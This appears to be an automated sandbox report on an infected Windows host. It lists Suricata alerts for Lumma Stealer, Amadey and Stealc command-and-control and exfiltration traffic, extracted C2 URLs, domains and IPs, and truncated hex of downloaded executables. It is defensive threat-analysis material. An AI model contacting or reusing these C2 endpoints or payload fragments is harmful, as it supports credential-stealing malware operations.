Source: Network traffic	Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:53665 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:50804 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50020 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50022 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50023 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50024 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:59511 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50027 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50032 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50041 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:63001 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50073 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50060 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50063 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50092 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:51563 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:63414 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:52578 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:63675 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50129 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50132 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50161 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:64907 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50172 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50174 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50213 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50216 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50220 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50219 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50215 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50204 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50225 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50227 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:59120 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:61880 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:57652 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:57123 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:63120 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50310 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50316 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50312 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50314 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50319 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50308 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50315 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:50306
Source: Network traffic	Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:62410 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50320 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:56860 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:57055 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50317 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50323 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50325 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50324 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:49772 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50321 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50328 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50327 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50329 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50331 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50332 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50335 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50337 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50334 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50357 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:62183 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:61000 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:63929 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:62720 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:53112 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50376 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50368 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50385 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50382 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50377 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50389 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:50384 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50387 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:54492 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50414 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50309 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50380 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50374 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:50383 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49999 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49999 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50001 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50001 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50006 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50006 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:50009 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:50005 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50020 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50020 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50023 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50003 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50003 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50092 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50129 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50129 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50132 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50132 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:50161 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:50319 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50309 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50309 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50216 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50220 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50308 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50308 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50323 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50323 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50324 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50033 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50325 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50325 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50022 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50022 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50337 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50374 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50374 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50376 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50376 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:50383 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50389 -> 104.21.5.155:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.206/6c4adf523b719729.php
Source: Malware configuration extractor	URLs: plaintifuf.site
Source: Malware configuration extractor	URLs: terracedjz.cyou
Source: Malware configuration extractor	URLs: unityshootsz.site
Source: Malware configuration extractor	URLs: honerstyzu.site
Source: Malware configuration extractor	URLs: monopuncdz.site
Source: Malware configuration extractor	URLs: uppermixturyz.site
Source: Malware configuration extractor	URLs: reinfomarbke.site
Source: Malware configuration extractor	URLs: moeventmynz.site
Source: Malware configuration extractor	URLs: bringlanejk.site
Source: Malware configuration extractor	URLs: http://185.215.113.206/6c4adf523b719729.php
Source: Malware configuration extractor	IPs: 185.215.113.43

Source: unknown

Network traffic detected: DNS query count 46

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 04 Nov 2024 16:32:07 GMTContent-Type: application/octet-streamContent-Length: 1192960Last-Modified: Mon, 04 Nov 2024 16:18:36 GMTConnection: keep-aliveETag: "6728f3dc-123400"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 08 00 73 b3 28 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 5c 0c 00 00 10 01 00 00 00 00 00 40 22 0b 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 12 00 00 06 00 00 00 00 00 00 03 00 40 c3 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 ee 0c 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 0d 00 28 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 b8 0c 00 18 00 00 00 40 84 0c 00 c0 00 00 00 00 00 00 00 00 00 00 00 f0 ef 0c 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 aa 5b 0c 00 00 10 00 00 00 5c 0c 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c 92 00 00 00 70 0c 00 00 94 00 00 00 62 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 49 00 00 00 10 0d 00 00 24 00 00 00 f6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 35 63 66 67 00 00 08 00 00 00 00 60 0d 00 00 02 00 00 00 1a 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 6f 6e 64 61 74 00 00 04 00 00 00 00 70 0d 00 00 02 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 09 00 00 00 00 80 0d 00 00 02 00 00 00 1e 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 28 50 00 00 00 90 0d 00 00 52 00 00 00 20 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 70 64 61 74 61 00 00 00 b2 04 00 00 f0 0d 00 00 c2 04 00 00 72 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 04 Nov 2024 16:32:15 GMTContent-Type: application/octet-streamContent-Length: 2977792Last-Modified: Mon, 04 Nov 2024 16:30:26 GMTConnection: keep-aliveETag: "6728f6a2-2d7000"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 d3 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 04 00 00 d6 00 00 00 00 00 00 00 80 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 30 00 00 04 00 00 71 94 2d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 a0 05 00 68 00 00 00 00 90 05 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 05 00 00 10 00 00 00 7e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 40 03 00 00 00 90 05 00 00 04 00 00 00 8e 02 00 00 00 